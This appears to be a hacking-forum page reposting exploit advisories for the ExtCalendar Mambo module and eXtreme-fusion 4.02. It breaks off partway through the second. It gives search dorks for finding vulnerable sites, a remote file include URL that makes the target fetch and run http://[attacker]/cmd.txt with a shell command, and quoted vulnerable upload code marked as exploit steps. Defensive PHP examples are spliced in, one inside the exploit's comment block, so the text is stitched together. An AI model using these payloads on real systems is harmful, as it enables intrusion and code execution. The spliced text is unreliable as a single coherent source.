http://www.example.com/i-accueil.php?chemin=conc99
http://www.example.com/i-index.php?chemin=conc99
Black_hat_cr(HCE)
ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
-
Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
##################################################
#############################
Discovered By OLiBekaS
-
dork : "powered by ExtCalendar v2"
Exploit :
http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls
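The request above only works because the script lets request data populate its configuration array before the include that reads it (typically via register_globals, which is an assumption here since the page does not show the ExtCalendar source), and the trailing `?` in the attacker URL turns whatever the script appends to `LANGUAGES_DIR` into a query string of the remote fetch instead of a path component. The following is an added example, not ExtCalendar's own code: it reconstructs the vulnerable shape implied by the exploit URL (every name beyond `CONFIG_EXT['LANGUAGES_DIR']` is assumed) and shows a hardened form that takes the directory from a constant the application defines, restricts the language name to a plain identifier, and confirms with `realpath()` that the resolved file lies inside that directory.

```php
<?php
// Added example, not ExtCalendar's code. Function and directory names are
// assumptions; only CONFIG_EXT['LANGUAGES_DIR'] comes from the exploit URL.

// Vulnerable shape (assumed from the exploit URL). With register_globals=On,
// or any extract($_GET)-style import, the request
//   ?CONFIG_EXT[LANGUAGES_DIR]=http://attacker/cmd.txt?
// defines $CONFIG_EXT before the script does, so this include fetches
// "http://attacker/cmd.txt?/english.php" and executes whatever it returns.
function load_language_vulnerable(array $CONFIG_EXT, string $lang): void
{
    include $CONFIG_EXT['LANGUAGES_DIR'] . '/' . $lang . '.php';
}

// Hardened shape: the directory is a constant the application owns, the
// language name is validated, and the resolved path must stay inside it.
const LANGUAGES_DIR = __DIR__ . '/languages';   // assumed layout

function load_language(string $lang): bool
{
    // Plain identifier only: no '/', no '..', no NUL byte, no 'http://'.
    if (!preg_match('/^[A-Za-z][A-Za-z0-9_-]{0,31}$/', $lang)) {
        return false;
    }
    $base = realpath(LANGUAGES_DIR);
    $real = realpath(LANGUAGES_DIR . '/' . $lang . '.php');
    // realpath() returns false for missing files and for URL wrappers, and
    // the prefix check rejects anything that resolved outside the directory.
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $real;
    return true;
}

// Usage: the language name may come from the request; the directory never does.
$lang = isset($_GET['lang']) ? (string) $_GET['lang'] : 'english';
if (!load_language($lang)) {
    load_language('english');
}
```

Two interpreter settings close this class of hole independently of application code: register_globals, the mechanism that lets `?CONFIG_EXT[LANGUAGES_DIR]=...` create the array (off by default since PHP 4.2, removed in PHP 5.4), and allow_url_include (off by default since PHP 5.2), which refuses `include` of an `http://` path even where allow_url_fopen stays enabled. Neither replaces the path check above, which also stops local traversal.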
-
greetz:
~~~~~
# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk,
brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy and other
-
Contact:
~~~~~~~
Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net
- [ eof ] -
baby_hacker(HCE)
Extreme-fusion <= 4.02 Remote Code Execution Exploit
PHP Code:
<?php
//Kacper Settings
$exploit_name = "extreme-fusion <= 4.02 Remote Code Execution Exploit";
$script_name = "eXtreme-fusion 4.02";
$script_site = "http://extreme-fusion.pl/download-cat16";
$dork = '"by eXtreme Crew"';
//**************************************************************
print ' ::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
[Exploit name: '.$exploit_name.'
[Script name: '.$script_name.'
[Script site: '.$script_site.'
dork: '.$dork.'
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: kacper1964@yahoo.pl
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon | friend str0ke ;)
pepi, nukedclx, SkD, MXZ, sysios, mIvus, wacky, xoron, fdj, mass, D3m0n (homie from Germany :P)
and
Dr Max Virus
TamTurk,
hackersecurity.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
/*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in file infusions/fusion_forum_view/fusion_forum_view.php:
[line 1-5]
<?
if (file_exists(INFUSIONS."fusion_forum_view/locale/".$settings['locale'].".php") ) { // < -{2}
include INFUSIONS."fusion_forum_view/locale/".$settings['locale'].".php"; // < -{1}
} else {
include INFUSIONS."fusion_forum_view/locale/English.php";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in file submit.php:
[line 342-373]
if (isset($_POST['submit_photo'])) {
require_once INCLUDES."photo_functions_include.php";
$error = "";
$submit_info['photo_title'] = stripinput($_POST['photo_title']);
$submit_info['photo_description'] = stripinput($_POST['photo_description']);
$submit_info['album_id'] = isNum($_POST['album_id']) ? $_POST['album_id'] : "0";
if (is_uploaded_file($_FILES['photo_pic_file']['tmp_name'])) {
$photo_types = array(".gif",".jpg",".jpeg",".png");
$photo_pic = $_FILES['photo_pic_file'];
$photo_name = strtolower(substr($photo_pic['name'], 0, strrpos($photo_pic['name'], ".")));
$photo_ext = strtolower(strrchr($photo_pic['name'],"."));
$photo_dest = PHOTOS."submissions/";
if (!preg_match("/^[-0-9A-Z_\[\]]+$/i", $photo_name)) {
$error = 1;
} elseif ($photo_pic['size'] > $settings['photo_max_b']){
$error = 2;
} elseif (!in_array($photo_ext, $photo_types)) {
$error = 3;
} else {
$photo_file = image_exists($photo_dest, $photo_name.$photo_ext);
move_uploaded_file($photo_pic['tmp_name'], $photo_dest.$photo_file); // < -{3(step1)}
chmod($photo_dest.$photo_file, 0644);
$imagefile = @getimagesize($photo_dest.$photo_file);
if (!verify_image($photo_dest.$photo_file)) {
$error = 3;
unlink($photo_dest.$photo_file);
} elseif ($imagefile[0] > $settings['photo_max_w'] || $imagefile[1] > $settings['photo_max_h']) {
$error = 4;
unlink($photo_dest.$photo_file);
} else {
$submit_info['photo_file'] = $photo_file;
}
}
}
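The photo handler above keeps the client-chosen basename, accepts a file once `getimagesize()` and `verify_image()` are satisfied, and writes it wherever `PHOTOS` points; the downloads handler quoted after it (step 2 in the author's numbering) moves the upload into `downloads/` under the client's own filename with no extension check at all. Below is an added example of a hardened upload routine; it is not eXtreme-fusion's code, and the upload directory, size limit and allowed types are assumptions chosen for the photo case.

```php
<?php
// Added example, not eXtreme-fusion's code: a hardened replacement for the
// upload handlers quoted on this page. UPLOAD_DIR, MAX_BYTES and ALLOWED are
// assumptions; the checks are what the quoted code does not perform.

// Assumed to be outside the document root, so nothing stored here can be
// requested as a script whatever its content.
const UPLOAD_DIR = '/srv/app-data/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;

// Last extension -> MIME type that finfo must report for the file's bytes.
const ALLOWED = [
    'gif'  => 'image/gif',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
];

/**
 * Stores one entry of $_FILES. Returns the server-chosen filename on
 * success, or a string beginning with "error:" describing the rejection.
 */
function store_upload(array $file): string
{
    // 1. Only a file PHP itself received through the upload mechanism.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return 'error:no_upload';
    }
    // 2. Size of the received file, measured on disk.
    if (filesize($file['tmp_name']) > MAX_BYTES) {
        return 'error:too_large';
    }
    // 3. Allowlist on the LAST extension. "shell.php.gif" is stored as .gif
    //    under a name we pick, so it is never served as "shell.php".
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return 'error:bad_extension';
    }
    // 4. The bytes must match the extension. Note that neither finfo nor
    //    getimagesize() rejects a valid image with PHP appended after the
    //    image data, so steps 3 and the non-executable directory are what
    //    actually prevent execution; this step only rejects non-images.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]) {
        return 'error:content_mismatch';
    }
    if (getimagesize($file['tmp_name']) === false) {
        return 'error:not_an_image';
    }
    // 5. Server-chosen name: no client input in the path, no traversal, and
    //    no file_exists() race against a second upload with the same name.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'error:move_failed';
    }
    chmod($dest, 0644);
    return $name;
}

// Usage in a submit handler: persist only the server-chosen name; if the
// original filename is ever displayed, escape it as text.
if (isset($_POST['submit_photo'], $_FILES['photo_pic_file'])) {
    $stored = store_upload($_FILES['photo_pic_file']);
    if (strncmp($stored, 'error:', 6) === 0) {
        $error = $stored;
    } else {
        $submit_info['photo_file'] = $stored;
    }
}
```

For the downloads handler the same routine applies with a different `ALLOWED` table and without the image check; the two properties that matter for that case are the ones it currently lacks, an extension allowlist and a storage name the client does not control.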
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in file submit.php:
[line 223-250]
if (isset($_POST['upload'])) {
opentable($locale['552']);
if ($_FILES['plik']['name']!="")
{
if(!file_exists("downloads/".$_FILES['plik']['name'])) {
move_uploaded_file($_FILES['plik']['tmp_name'],"downloads/".$_FILES['plik']['name']); // < -{3(step2)}
switch($_FILES['plik']['error']) {
case '0': echo $locale['542'].round($_FILES['plik']['size'] / 1024).'KB';
$submit_info['download_title'] = stripinput($_POST['download_title']);
$submit_info['download_description'] = stripinput($_POST['download_description']);
$submit_info['download_url'] = "downloads/".$_FILES['plik'][